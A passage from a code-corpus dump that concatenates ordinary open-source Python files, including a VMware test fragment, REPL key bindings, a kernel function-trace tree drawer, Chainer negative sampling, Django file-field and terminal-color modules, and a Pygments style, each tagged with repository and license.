mock.patch.object(self._volumeops, '_iscsi_get_host_iqn',
return_value=iqn)
) as (fake_get_vm_ref, fake_iscsi_get_host_iqn):
connector = self._volumeops.get_volume_connector(self._instance)
fake_get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
fake_iscsi_get_host_iqn.assert_called_once_with(self._instance)
self.assertEqual(host_ip, connector['ip'])
self.assertEqual(host_ip, connector['host'])
self.assertEqual(iqn, connector['initiator'])
self.assertEqual(vm_id, connector['instance'])
| apache-2.0 |
m4yers/crutch | crutch/core/repl/keys.py | 1 | 2604 | # -*- coding: utf-8 -*-
# Copyright © 2017 Artyom Goncharov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
from __future__ import print_function
from prompt_toolkit.key_binding.manager import KeyBindingManager
from prompt_toolkit.keys import Keys
def get_key_manager(set_long_options, get_long_options): #pragma: no cover
assert callable(set_long_options)
assert callable(get_long_options)
manager = KeyBindingManager(
enable_search=True,
enable_system_bindings=True,
enable_abort_and_exit_bindings=True)
@manager.registry.add_binding(Keys.F2)
def opt_help(event):
"""
When F2 has been pressed, fill in the "help" command.
"""
event.cli.current_buffer.insert_text("help")
@manager.registry.add_binding(Keys.F3)
def opt_set_options_length(_):
"""
Enable/Disable long option name suggestion.
"""
set_long_options(not get_long_options())
@manager.registry.add_binding(Keys.F10)
def opt_exit(_):
"""
When F10 has been pressed, quit.
"""
# Unused parameters for linter.
raise EOFError
@manager.registry.add_binding(Keys.ControlSpace)
def opt_auto_complete(event):
"""
Initialize autocompletion at cursor. If the autocompletion menu is not
showing, display it with the appropriate completions for the context. If
the menu is showing, select the next completion.
"""
buf = event.cli.current_buffer
if buf.complete_state:
buf.complete_next()
else:
event.cli.start_completion(select_first=False)
return manager
| mit |
eMarco/kernel_samsung_tuna | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
umitanuki/chainer | chainer/functions/negative_sampling.py | 4 | 6735 | import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
from chainer.utils import walker_alias
class NegativeSampling(function.Function):
"""Implementation of negative sampling.
In natural language processing, especially language modeling, the number of
vocabulary is very large.
Therefore, you need to spend a lot of time to calculate the gradient of the
embedding matrix.
Instead, in negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \log\sigma(x^\\top w_p) + \\
k E_{i \sim P(i)}[\log\sigma(- x^\\top w_i)],
where :math:`\sigma(\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximeted with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \log\sigma(x^\\top w_p) + \\
\sum_{n \in N} \log\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
in_size (int): Dimension of input vectors.
counts (int list): Number of each identifiers.
sample_size (int): Number of negative samples.
power (float): Power factor :math:`\\alpha`.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
"""
parameter_names = ('W',)
gradient_names = ('gW',)
def __init__(self, in_size, counts, sample_size, power=0.75):
self.sample_size = sample_size
p = numpy.array(counts, numpy.float32)
p = numpy.power(p, p.dtype.type(power))
self.sampler = walker_alias.WalkerAlias(p)
vocab_size = len(counts)
self.W = numpy.zeros((vocab_size, in_size)).astype(numpy.float32)
self.gW = numpy.zeros_like(self.W)
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler.sample((size, self.sample_size + 1))
if isinstance(samples, numpy.ndarray):
samples.T[0] = t
else:
cuda.elementwise(
'T t, int32 m', 'raw T s', 's[i * m] = t;',
'negative_sampling_assign'
)(t, self.sample_size + 1, samples)
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, t_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0]
)
def to_gpu(self, device=None):
super(NegativeSampling, self).to_gpu(device)
self.sampler.to_gpu()
def to_cpu(self):
super(NegativeSampling, self).to_cpu()
self.sampler.to_cpu()
def forward_cpu(self, inputs):
x, t = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
f += x[(i / m) * c + j] * W[k * c + j];
}
wx = f;
''',
'negative_sampling_wx'
)(self.W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
} else {
loss = f + __logf(1 + __expf(-f));
}
y = loss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t = inputs
gloss, = grads
gx = numpy.zeros_like(x)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
self.gW[ik] += ig * ix
return gx, None
def backward_gpu(self, inputs, grads):
x, t = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cuda.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, self.W, self.samples, n_in, self.sample_size + 1, gx)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, self.gW)
return gx, None
| mit |
alexallah/django | django/db/models/fields/files.py | 11 | 18028 | import datetime
import posixpath
from django import forms
from django.core import checks
from django.core.files.base import File
from django.core.files.images import ImageFile
from django.core.files.storage import default_storage
from django.core.validators import validate_image_file_extension
from django.db.models import signals
from django.db.models.fields import Field
from django.utils.translation import gettext_lazy as _
class FieldFile(File):
def __init__(self, instance, field, name):
super().__init__(None, name)
self.instance = instance
self.field = field
self.storage = field.storage
self._committed = True
def __eq__(self, other):
# Older code may be expecting FileField values to be simple strings.
# By overriding the == operator, it can remain backwards compatibility.
if hasattr(other, 'name'):
return self.name == other.name
return self.name == other
def __hash__(self):
return hash(self.name)
# The standard File contains most of the necessary properties, but
# FieldFiles can be instantiated without a name, so that needs to
# be checked for here.
def _require_file(self):
if not self:
raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)
def _get_file(self):
self._require_file()
if not hasattr(self, '_file') or self._file is None:
self._file = self.storage.open(self.name, 'rb')
return self._file
def _set_file(self, file):
self._file = file
def _del_file(self):
del self._file
file = property(_get_file, _set_file, _del_file)
@property
def path(self):
self._require_file()
return self.storage.path(self.name)
@property
def url(self):
self._require_file()
return self.storage.url(self.name)
@property
def size(self):
self._require_file()
if not self._committed:
return self.file.size
return self.storage.size(self.name)
def open(self, mode='rb'):
self._require_file()
if hasattr(self, '_file') and self._file is not None:
self.file.open(mode)
else:
self.file = self.storage.open(self.name, mode)
return self
# open() doesn't alter the file's contents, but it does reset the pointer
open.alters_data = True
# In addition to the standard File API, FieldFiles have extra methods
# to further manipulate the underlying file, as well as update the
# associated model instance.
def save(self, name, content, save=True):
name = self.field.generate_filename(self.instance, name)
self.name = self.storage.save(name, content, max_length=self.field.max_length)
setattr(self.instance, self.field.name, self.name)
self._committed = True
# Save the object because it has changed, unless save is False
if save:
self.instance.save()
save.alters_data = True
def delete(self, save=True):
if not self:
return
# Only close the file if it's already open, which we know by the
# presence of self._file
if hasattr(self, '_file'):
self.close()
del self.file
self.storage.delete(self.name)
self.name = None
setattr(self.instance, self.field.name, self.name)
self._committed = False
if save:
self.instance.save()
delete.alters_data = True
@property
def closed(self):
file = getattr(self, '_file', None)
return file is None or file.closed
def close(self):
file = getattr(self, '_file', None)
if file is not None:
file.close()
def __getstate__(self):
# FieldFile needs access to its associated model field and an instance
# it's attached to in order to work properly, but the only necessary
# data to be pickled is the file's name itself. Everything else will
# be restored later, by FileDescriptor below.
return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileDescriptor:
"""
The descriptor for the file attribute on the model instance. Return a
FieldFile when accessed so you can write code like::
>>> from myapp.models import MyModel
>>> instance = MyModel.objects.get(pk=1)
>>> instance.file.size
Assign a file object on assignment so you can do::
>>> with open('/path/to/hello.world', 'r') as f:
... instance.file = File(f)
"""
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
# This is slightly complicated, so worth an explanation.
# instance.file`needs to ultimately return some instance of `File`,
# probably a subclass. Additionally, this returned object needs to have
# the FieldFile API so that users can easily do things like
# instance.file.path and have that delegated to the file storage engine.
# Easy enough if we're strict about assignment in __set__, but if you
# peek below you can see that we're not. So depending on the current
# value of the field we have to dynamically construct some sort of
# "thing" to return.
# The instance dict contains whatever was originally assigned
# in __set__.
if self.field.name in instance.__dict__:
file = instance.__dict__[self.field.name]
else:
instance.refresh_from_db(fields=[self.field.name])
file = getattr(instance, self.field.name)
# If this value is a string (instance.file = "path/to/file") or None
# then we simply wrap it with the appropriate attribute class according
# to the file field. [This is FieldFile for FileFields and
# ImageFieldFile for ImageFields; it's also conceivable that user
# subclasses might also want to subclass the attribute class]. This
# object understands how to convert a path to a file, and also how to
# handle None.
if isinstance(file, str) or file is None:
attr = self.field.attr_class(instance, self.field, file)
instance.__dict__[self.field.name] = attr
# Other types of files may be assigned as well, but they need to have
# the FieldFile interface added to them. Thus, we wrap any other type of
# File inside a FieldFile (well, the field's attr_class, which is
# usually FieldFile).
elif isinstance(file, File) and not isinstance(file, FieldFile):
file_copy = self.field.attr_class(instance, self.field, file.name)
file_copy.file = file
file_copy._committed = False
instance.__dict__[self.field.name] = file_copy
# Finally, because of the (some would say boneheaded) way pickle works,
# the underlying FieldFile might not actually itself have an associated
# file. So we need to reset the details of the FieldFile in those cases.
elif isinstance(file, FieldFile) and not hasattr(file, 'field'):
file.instance = instance
file.field = self.field
file.storage = self.field.storage
# Make sure that the instance is correct.
elif isinstance(file, FieldFile) and instance is not file.instance:
file.instance = instance
# That was fun, wasn't it?
return instance.__dict__[self.field.name]
def __set__(self, instance, value):
instance.__dict__[self.field.name] = value
class FileField(Field):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = FieldFile
# The descriptor to use for accessing the attribute off of the class.
descriptor_class = FileDescriptor
description = _("File")
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
self._primary_key_set_explicitly = 'primary_key' in kwargs
self.storage = storage or default_storage
self.upload_to = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_primary_key())
errors.extend(self._check_upload_to())
return errors
def _check_primary_key(self):
if self._primary_key_set_explicitly:
return [
checks.Error(
"'primary_key' is not a valid argument for a %s." % self.__class__.__name__,
obj=self,
id='fields.E201',
)
]
else:
return []
def _check_upload_to(self):
if isinstance(self.upload_to, str) and self.upload_to.startswith('/'):
return [
checks.Error(
"%s's 'upload_to' argument must be a relative path, not an "
"absolute path." % self.__class__.__name__,
obj=self,
id='fields.E202',
hint='Remove the leading slash.',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if kwargs.get("max_length") == 100:
del kwargs["max_length"]
kwargs['upload_to'] = self.upload_to
if self.storage is not default_storage:
kwargs['storage'] = self.storage
return name, path, args, kwargs
def get_internal_type(self):
return "FileField"
def get_prep_value(self, value):
value = super().get_prep_value(value)
# Need to convert File objects provided via a form to string for database insertion
if value is None:
return None
return str(value)
def pre_save(self, model_instance, add):
file = super().pre_save(model_instance, add)
if file and not file._committed:
# Commit the file to storage prior to saving the model
file.save(file.name, file.file, save=False)
return file
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
setattr(cls, self.name, self.descriptor_class(self))
def generate_filename(self, instance, filename):
"""
Apply (if callable) or prepend (if a string) upload_to to the filename,
then delegate further processing of the name to the storage backend.
Until the storage layer, all file paths are expected to be Unix style
(with forward slashes).
"""
if callable(self.upload_to):
filename = self.upload_to(instance, filename)
else:
dirname = datetime.datetime.now().strftime(self.upload_to)
filename = posixpath.join(dirname, filename)
return self.storage.generate_filename(filename)
def save_form_data(self, instance, data):
# Important: None means "no change", other false value means "clear"
# This subtle distinction (rather than a more explicit marker) is
# needed because we need to consume values that are also sane for a
# regular (non Model-) Form to find in its cleaned_data dictionary.
if data is not None:
# This value will be converted to str and stored in the
# database, so leaving False as-is is not acceptable.
if not data:
data = ''
setattr(instance, self.name, data)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FileField, 'max_length': self.max_length}
defaults.update(kwargs)
return super().formfield(**defaults)
class ImageFileDescriptor(FileDescriptor):
"""
Just like the FileDescriptor, but for ImageFields. The only difference is
assigning the width/height to the width_field/height_field, if appropriate.
"""
def __set__(self, instance, value):
previous_file = instance.__dict__.get(self.field.name)
super().__set__(instance, value)
# To prevent recalculating image dimensions when we are instantiating
# an object from the database (bug #11084), only update dimensions if
# the field had a value before this assignment. Since the default
# value for FileField subclasses is an instance of field.attr_class,
# previous_file will only be None when we are called from
# Model.__init__(). The ImageField.update_dimension_fields method
# hooked up to the post_init signal handles the Model.__init__() cases.
# Assignment happening outside of Model.__init__() will trigger the
# update right here.
if previous_file is not None:
self.field.update_dimension_fields(instance, force=True)
class ImageFieldFile(ImageFile, FieldFile):
def delete(self, save=True):
# Clear the image dimensions cache
if hasattr(self, '_dimensions_cache'):
del self._dimensions_cache
super().delete(save)
class ImageField(FileField):
default_validators = [validate_image_file_extension]
attr_class = ImageFieldFile
descriptor_class = ImageFileDescriptor
description = _("Image")
def __init__(self, verbose_name=None, name=None, width_field=None, height_field=None, **kwargs):
self.width_field, self.height_field = width_field, height_field
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_image_library_installed())
return errors
def _check_image_library_installed(self):
try:
from PIL import Image # NOQA
except ImportError:
return [
checks.Error(
'Cannot use ImageField because Pillow is not installed.',
hint=('Get Pillow at https://pypi.python.org/pypi/Pillow '
'or run command "pip install Pillow".'),
obj=self,
id='fields.E210',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.width_field:
kwargs['width_field'] = self.width_field
if self.height_field:
kwargs['height_field'] = self.height_field
return name, path, args, kwargs
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
# Attach update_dimension_fields so that dimension fields declared
# after their corresponding image field don't stay cleared by
# Model.__init__, see bug #11196.
# Only run post-initialization dimension update on non-abstract models
if not cls._meta.abstract:
signals.post_init.connect(self.update_dimension_fields, sender=cls)
def update_dimension_fields(self, instance, force=False, *args, **kwargs):
"""
Update field's width and height fields, if defined.
This method is hooked up to model's post_init signal to update
dimensions after instantiating a model instance. However, dimensions
won't be updated if the dimensions fields are already populated. This
avoids unnecessary recalculation when loading an object from the
database.
Dimensions can be forced to update with force=True, which is how
ImageFileDescriptor.__set__ calls this method.
"""
# Nothing to update if the field doesn't have dimension fields or if
# the field is deferred.
has_dimension_fields = self.width_field or self.height_field
if not has_dimension_fields or self.attname not in instance.__dict__:
return
# getattr will call the ImageFileDescriptor's __get__ method, which
# coerces the assigned value into an instance of self.attr_class
# (ImageFieldFile in this case).
file = getattr(instance, self.attname)
# Nothing to update if we have no file and not being forced to update.
if not file and not force:
return
dimension_fields_filled = not(
(self.width_field and not getattr(instance, self.width_field)) or
(self.height_field and not getattr(instance, self.height_field))
)
# When both dimension fields have values, we are most likely loading
# data from the database or updating an image field that already had
# an image stored. In the first case, we don't want to update the
# dimension fields because we are already getting their values from the
# database. In the second case, we do want to update the dimensions
# fields and will skip this return because force will be True since we
# were called from ImageFileDescriptor.__set__.
if dimension_fields_filled and not force:
return
# file should be an instance of ImageFieldFile or should be None.
if file:
width = file.width
height = file.height
else:
# No file, so clear dimensions fields.
width = None
height = None
# Update the width and height fields.
if self.width_field:
setattr(instance, self.width_field, width)
if self.height_field:
setattr(instance, self.height_field, height)
def formfield(self, **kwargs):
defaults = {'form_class': forms.ImageField}
defaults.update(kwargs)
return super().formfield(**defaults)
| bsd-3-clause |
Medigate/cutiuta-server | cutiuta-server/env/lib/python3.4/site-packages/django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'SUCCESS': {},
'WARNING': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a palette definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a background color.
bg is a background color.
option is a display options.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the palette
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
| gpl-3.0 |
javierTerry/odoo | addons/web/doc/_themes/flask_theme_support.py | 2228 | 4875 | # flasky extensions. flasky pygments style based on tango style
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class FlaskyStyle(Style):
background_color = "#f8f8f8"
default_style = ""
styles = {
# No corresponding class for the following:
#Text: "", # class: ''
Whitespace: "underline #f8f8f8", # class: 'w'
Error: "#a40000 border:#ef2929", # class: 'err'
Other: "#000000", # class 'x'
Comment: "italic #8f5902", # class: 'c'
Comment.Preproc: "noitalic", # class: 'cp'
Keyword: "bold #004461", # class: 'k'
Keyword.Constant: "bold #004461", # class: 'kc'
Keyword.Declaration: "bold #004461", # class: 'kd'
Keyword.Namespace: "bold #004461", # class: 'kn'
Keyword.Pseudo: "bold #004461", # class: 'kp'
Keyword.Reserved: "bold #004461", # class: 'kr'
Keyword.Type: "bold #004461", # class: 'kt'
Operator: "#582800", # class: 'o'
Operator.Word: "bold #004461", # class: 'ow' - like keywords
Punctuation: "bold #000000", # class: 'p'
# because special names such as Name.Class, Name.Function, etc.
# are not recognized as such later in the parsing, we choose them
# to look the same as ordinary variables.
Name: "#000000", # class: 'n'
Name.Attribute: "#c4a000", # class: 'na' - to be revised
Name.Builtin: "#004461", # class: 'nb'
Name.Builtin.Pseudo: "#3465a4", # class: 'bp'
Name.Class: "#000000", # class: 'nc' - to be revised
Name.Constant: "#000000", # class: 'no' - to be revised
Name.Decorator: "#888", # class: 'nd' - to be revised
Name.Entity: "#ce5c00", # class: 'ni'
Name.Exception: "bold #cc0000", # class: 'ne'
Name.Function: "#000000", # class: 'nf'
Name.Property: "#000000", # class: 'py'
Name.Label: "#f57900", # class: 'nl'
Name.Namespace: "#000000", # class: 'nn' - to be revised
Name.Other: "#000000", # class: 'nx'
Name.Tag: "bold #004461", # class: 'nt' - like a keyword
Name.Variable: "#000000", # class: 'nv' - to be revised
Name.Variable.Class: "#000000", # class: 'vc' - to be revised
Name.Variable.Global: "#000000", # class: 'vg' - to be revised
